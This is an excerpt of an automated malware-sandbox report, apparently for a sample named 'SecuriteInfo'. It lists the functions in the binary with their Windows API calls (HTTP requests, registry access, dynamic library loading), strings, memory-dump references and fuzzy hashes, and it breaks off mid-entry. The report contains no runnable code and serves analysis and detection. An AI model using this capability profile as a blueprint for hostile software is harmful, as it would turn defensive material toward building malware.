                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: FromProg$FreeTask_memcmp
                    • String ID: ,,~
                    • API String ID: 314563124-1083855107
                    • Opcode ID: 25d6196784aca546f019fc53695bc8e6c3541248cdb2e108abab0272147c3045
                    • Instruction ID: a315bf806007a10576dfba5dda8fbba4482d199b8c58deff541c93a5ffe3bbd6
                    • Opcode Fuzzy Hash: 25d6196784aca546f019fc53695bc8e6c3541248cdb2e108abab0272147c3045
                    • Instruction Fuzzy Hash: E8810CB1A00109EFCB04DF94C984EEEB7B9FF89315F204599F516AB250DB75AE06CB60
                    Function 007C8902 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                    Download Yara Rule
                    APIs
                    • VariantInit.OLEAUT32(?), ref: 007C8928
                    • CharUpperBuffW.USER32(?,?), ref: 007C8A37
                    • VariantClear.OLEAUT32(?), ref: 007C8BAF
                      • Part of subcall function 007B7804: VariantInit.OLEAUT32(00000000), ref: 007B7844
                      • Part of subcall function 007B7804: VariantCopy.OLEAUT32(00000000,?), ref: 007B784D
                      • Part of subcall function 007B7804: VariantClear.OLEAUT32(00000000), ref: 007B7859
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                    • API String ID: 4237274167-1221869570
                    • Opcode ID: 92e7798c89a295abb1de80bd34366f460ce54b2dfd277a15a6252fd98ad106b9
                    • Instruction ID: a1e17487c92abffa88426132d780584de431be90ee7b65aa07073772561d2b94
                    • Opcode Fuzzy Hash: 92e7798c89a295abb1de80bd34366f460ce54b2dfd277a15a6252fd98ad106b9
                    • Instruction Fuzzy Hash: E6916CB5608301DFC754DF24C484E5ABBE4EF89314F04896EF99A8B361DB38E909CB52
                    Function 007B2F86 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0076FEC6: _wcscpy.LIBCMT ref: 0076FEE9
                    • _memset.LIBCMT ref: 007B3077
                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 007B30A6
                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 007B3159
                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 007B3187
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ItemMenu$Info$Default_memset_wcscpy
                    • String ID: 0
                    • API String ID: 4152858687-4108050209
                    • Opcode ID: 9f9c040ab0bf7ec1bb1038f340af02269e4d1f80a54cf40beef417e0369475e3
                    • Instruction ID: aa5b71d039dbe1abc597c72c3a7678a217711a1ca0b522f03c721e97cdb2f8dd
                    • Opcode Fuzzy Hash: 9f9c040ab0bf7ec1bb1038f340af02269e4d1f80a54cf40beef417e0369475e3
                    • Instruction Fuzzy Hash: 6C51F2316097089AD714AF28C849BEBB7E9EF44360F044A2DF895D3191EB78CE85C752
                    Function 007B2C42 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 007B2CAF
                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 007B2CCB
                    • DeleteMenu.USER32(?,00000007,00000000), ref: 007B2D11
                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00816890,00000000), ref: 007B2D5A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Menu$Delete$InfoItem_memset
                    • String ID: 0
                    • API String ID: 1173514356-4108050209
                    • Opcode ID: 9de7e8b9d82505bed67fa29228ecaedbdcc97e839f7bf9d029c565f342179c4a
                    • Instruction ID: ae975927ba7c6b4e14ad145effb99b42a37db193ad71563d934d4b96384043d3
                    • Opcode Fuzzy Hash: 9de7e8b9d82505bed67fa29228ecaedbdcc97e839f7bf9d029c565f342179c4a
                    • Instruction Fuzzy Hash: C341B4302063019FD714DF24D849B9BBBE4FF85320F14465EF96697292DB78E906CBA2
                    Function 007CDAB9 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                    Download Yara Rule
                    APIs
                    • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 007CDAD9
                      • Part of subcall function 007579AB: _memmove.LIBCMT ref: 007579F9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: BuffCharLower_memmove
                    • String ID: cdecl$none$stdcall$winapi
                    • API String ID: 3425801089-567219261
                    • Opcode ID: 5e684134f5e37ad44ea1947583e19d85a9129d466c10aeb94c441fe0ba60f307
                    • Instruction ID: a3cb418f35b7d611030d3e0ff669b5f33ad206164080fdd79f97aaac6832cac7
                    • Opcode Fuzzy Hash: 5e684134f5e37ad44ea1947583e19d85a9129d466c10aeb94c441fe0ba60f307
                    • Instruction Fuzzy Hash: EE317270600619EBCF20EFA4CC959EEB7B4FF05310B10862DE866A76D1DB75AD09CB90
                    Function 007A9372 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00757F41: _memmove.LIBCMT ref: 00757F82
                      • Part of subcall function 007AB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 007AB0E7
                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 007A93F6
                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 007A9409
                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 007A9439
                      • Part of subcall function 00757D2C: _memmove.LIBCMT ref: 00757D66
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: MessageSend$_memmove$ClassName
                    • String ID: ComboBox$ListBox
                    • API String ID: 365058703-1403004172
                    • Opcode ID: a5764715616588b82b82f2a9b188a59bca36ccf282882d12354af6b419d7c01f
                    • Instruction ID: 0b59d862ae501419f034b75bd22afaa5be4b32d1f958f975592c5c5e26b9ce13
                    • Opcode Fuzzy Hash: a5764715616588b82b82f2a9b188a59bca36ccf282882d12354af6b419d7c01f
                    • Instruction Fuzzy Hash: 1521E4B1A00104FEDB18AB74DC8ACFFB778DF46350B108219FA26972E1DB7D490A9620
                    Function 007C1B21 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                    Download Yara Rule
                    APIs
                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 007C1B40
                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007C1B66
                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 007C1B96
                    • InternetCloseHandle.WININET(00000000), ref: 007C1BDD
                      • Part of subcall function 007C2777: GetLastError.KERNEL32(?,?,007C1B0B,00000000,00000000,00000001), ref: 007C278C
                      • Part of subcall function 007C2777: SetEvent.KERNEL32(?,?,007C1B0B,00000000,00000000,00000001), ref: 007C27A1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                    • String ID:
                    • API String ID: 3113390036-3916222277
                    • Opcode ID: c435dcf97b12d6c50db58b02d6c7d390d421ec98ff0d02accadaf8609d14b08d
                    • Instruction ID: 1ab2b7f098c228eb887ddeecf90fa53ee8abccf35f074c0eccbce6dd159749be
                    • Opcode Fuzzy Hash: c435dcf97b12d6c50db58b02d6c7d390d421ec98ff0d02accadaf8609d14b08d
                    • Instruction Fuzzy Hash: 72218EB1500208BFEB119F609CC9FBB77FCEB4A754F50812EF506A6241EB289D059B61
                    Function 007D6656 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00751D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00751D73
                      • Part of subcall function 00751D35: GetStockObject.GDI32(00000011), ref: 00751D87
                      • Part of subcall function 00751D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00751D91
                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 007D66D0
                    • LoadLibraryW.KERNEL32(?), ref: 007D66D7
                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 007D66EC
                    • DestroyWindow.USER32(?), ref: 007D66F4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                    • String ID: SysAnimate32
                    • API String ID: 4146253029-1011021900
                    • Opcode ID: 9a3fb58cd74794dc0bea08ee61c6e2150bc40358f0098e9ac2583fac8f7ba6c0
                    • Instruction ID: 17c8fbc9eb94374af053188353fe3354666381fa34e3e11e69085efd6e384c1d
                    • Opcode Fuzzy Hash: 9a3fb58cd74794dc0bea08ee61c6e2150bc40358f0098e9ac2583fac8f7ba6c0
                    • Instruction Fuzzy Hash: 31219D7120020AEFEF105F64EC80EBB37BDEF59368F10862AF951922A0D779CC519760
                    Function 007B703E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                    Download Yara Rule
                    APIs
                    • GetStdHandle.KERNEL32(0000000C), ref: 007B705E
                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 007B7091
                    • GetStdHandle.KERNEL32(0000000C), ref: 007B70A3
                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 007B70DD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: CreateHandle$FilePipe
                    • String ID: nul
                    • API String ID: 4209266947-2873401336
                    • Opcode ID: 9a28d53cbdf8847e079c8dde2eb10fce30331c61afde1a27779be8a404536b80
                    • Instruction ID: 94d7f66e2936853ef01d3a93c04ff98e062c87c9db54005e9525992c06764176
                    • Opcode Fuzzy Hash: 9a28d53cbdf8847e079c8dde2eb10fce30331c61afde1a27779be8a404536b80
                    • Instruction Fuzzy Hash: EA215174604209AFDB24AF38DC09BEA77B8BF94720F20861AFDA1D72D0D7789950CB50
                    Function 007B710C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                    Download Yara Rule
                    APIs
                    • GetStdHandle.KERNEL32(000000F6), ref: 007B712B
                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 007B715D
                    • GetStdHandle.KERNEL32(000000F6), ref: 007B716E
                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 007B71A8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: CreateHandle$FilePipe
                    • String ID: nul
                    • API String ID: 4209266947-2873401336
                    • Opcode ID: 34bc275bf3644db9498c83c9c99e1f9c9bb8b2a2db8dc1f19f022c5e1d1b94f4
                    • Instruction ID: f8caef5ff0244f46bea2c13eabfbab7b3a09a1e2bc823d69ad0872d8010d1ffa
                    • Opcode Fuzzy Hash: 34bc275bf3644db9498c83c9c99e1f9c9bb8b2a2db8dc1f19f022c5e1d1b94f4
                    • Instruction Fuzzy Hash: 8221907560420DABDB249F6C9C04BEAB7B8BFD5720F204619F9A1D32D0D778A841CB64
                    Function 007BAEAB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                    Download Yara Rule
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 007BAEBF
                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 007BAF13
                    • __swprintf.LIBCMT ref: 007BAF2C
                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,007DF910), ref: 007BAF6A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ErrorMode$InformationVolume__swprintf
                    • String ID: %lu
                    • API String ID: 3164766367-685833217
                    • Opcode ID: b5a30ebd16c610a22291dae0b7c842d0a486a91597ff67678df004503bb07aa2
                    • Instruction ID: 418c0574649626deeb44b986c82a03017251bbb8861e6ab7f2e3bb75857be98b
                    • Opcode Fuzzy Hash: b5a30ebd16c610a22291dae0b7c842d0a486a91597ff67678df004503bb07aa2
                    • Instruction Fuzzy Hash: B6216270A00109EFCB10EF64C989EEE7BB8EF89704B008069F909DB251DB75EA45CB61
                    Function 007AA52F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00757D2C: _memmove.LIBCMT ref: 00757D66
                      • Part of subcall function 007AA37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 007AA399
                      • Part of subcall function 007AA37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 007AA3AC
                      • Part of subcall function 007AA37C: GetCurrentThreadId.KERNEL32 ref: 007AA3B3
                      • Part of subcall function 007AA37C: AttachThreadInput.USER32(00000000), ref: 007AA3BA
                    • GetFocus.USER32 ref: 007AA554
                      • Part of subcall function 007AA3C5: GetParent.USER32(?), ref: 007AA3D3
                    • GetClassNameW.USER32(?,?,00000100), ref: 007AA59D
                    • EnumChildWindows.USER32(?,007AA615), ref: 007AA5C5
                    • __swprintf.LIBCMT ref: 007AA5DF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                    • String ID: %s%d
                    • API String ID: 1941087503-1110647743
                    • Opcode ID: d678a122264c6eab733bcb878069dcb1fcab10b62820034282eac1820081146f
                    • Instruction ID: 4e2f3e676be4570a162f2f395289ef2641b8990b6a5f9e6486c9b93f41dcc474
                    • Opcode Fuzzy Hash: d678a122264c6eab733bcb878069dcb1fcab10b62820034282eac1820081146f
                    • Instruction Fuzzy Hash: 2911B471600208BBDF11BF60DC89FEA3778AF8A701F048175FD09AA152CB795945CB75
                    Function 007B2017 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                    Download Yara Rule
                    APIs
                    • CharUpperBuffW.USER32(?,?), ref: 007B2048
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: BuffCharUpper
                    • String ID: APPEND$EXISTS$KEYS$REMOVE
                    • API String ID: 3964851224-769500911
                    • Opcode ID: ec60460ba97184aa47f86de45eb588ad6371133ebd9628150875a7dda1d277bf
                    • Instruction ID: 0343116228eaa503ab50bdffc7941188c15223da21dbb1e6b46bdbaf3444647c
                    • Opcode Fuzzy Hash: ec60460ba97184aa47f86de45eb588ad6371133ebd9628150875a7dda1d277bf
                    • Instruction Fuzzy Hash: E3116D30911209DFCF14EFB8D8515EEB7B4FF19304B208869D856A7292EB36690BCB90
                    Function 007CEE69 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                    Download Yara Rule
                    APIs
                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 007CEF1B
                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 007CEF4B
                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 007CF07E
                    • CloseHandle.KERNEL32(?), ref: 007CF0FF
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                    • String ID:
                    • API String ID: 2364364464-0
                    • Opcode ID: aa84a6736496e7738b5c197295f7704b26866f73f107a403a9a6451b156225c9
                    • Instruction ID: e3c6ee75f5d375c4a7dcee08c08e510ab171554272754bec093e922c93ce8ef7
                    • Opcode Fuzzy Hash: aa84a6736496e7738b5c197295f7704b26866f73f107a403a9a6451b156225c9
                    • Instruction Fuzzy Hash: 28817371604700DFD720DF28C84AF6AB7E5AF88B10F14881DF996DB292DBB9AD44CB51
                    Function 007D02C2 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00757F41: _memmove.LIBCMT ref: 00757F82
                      • Part of subcall function 007D10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007D0038,?,?), ref: 007D10BC
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007D0388
                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007D03C7
                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 007D040E
                    • RegCloseKey.ADVAPI32(?,?), ref: 007D043A
                    • RegCloseKey.ADVAPI32(00000000), ref: 007D0447
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                    • String ID:
                    • API String ID: 3440857362-0
                    • Opcode ID: 6242102c56ea99c255dfc4b37479b2d8ef4cfea8fe7770fbd8ce46c3dfccf9ef
                    • Instruction ID: ed15c5fbd81e45421d89b345d6a0e6d8676fc87a2df8768776aea744f3be627b
                    • Opcode Fuzzy Hash: 6242102c56ea99c255dfc4b37479b2d8ef4cfea8fe7770fbd8ce46c3dfccf9ef
                    • Instruction Fuzzy Hash: 59513B71208244EFD704EB64D885FAAB7F8FF84314F44892EF59687291DB78E909CB52
                    Function 007CDBDC Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00759997: __itow.LIBCMT ref: 007599C2
                      • Part of subcall function 00759997: __swprintf.LIBCMT ref: 00759A0C
                    • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 007CDC3B
                    • GetProcAddress.KERNEL32(00000000,?), ref: 007CDCBE
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 007CDCDA
                    • GetProcAddress.KERNEL32(00000000,?), ref: 007CDD1B
                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 007CDD35
                      • Part of subcall function 00755B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,007B7B20,?,?,00000000), ref: 00755B8C
                      • Part of subcall function 00755B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,007B7B20,?,?,00000000,?,?), ref: 00755BB0
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
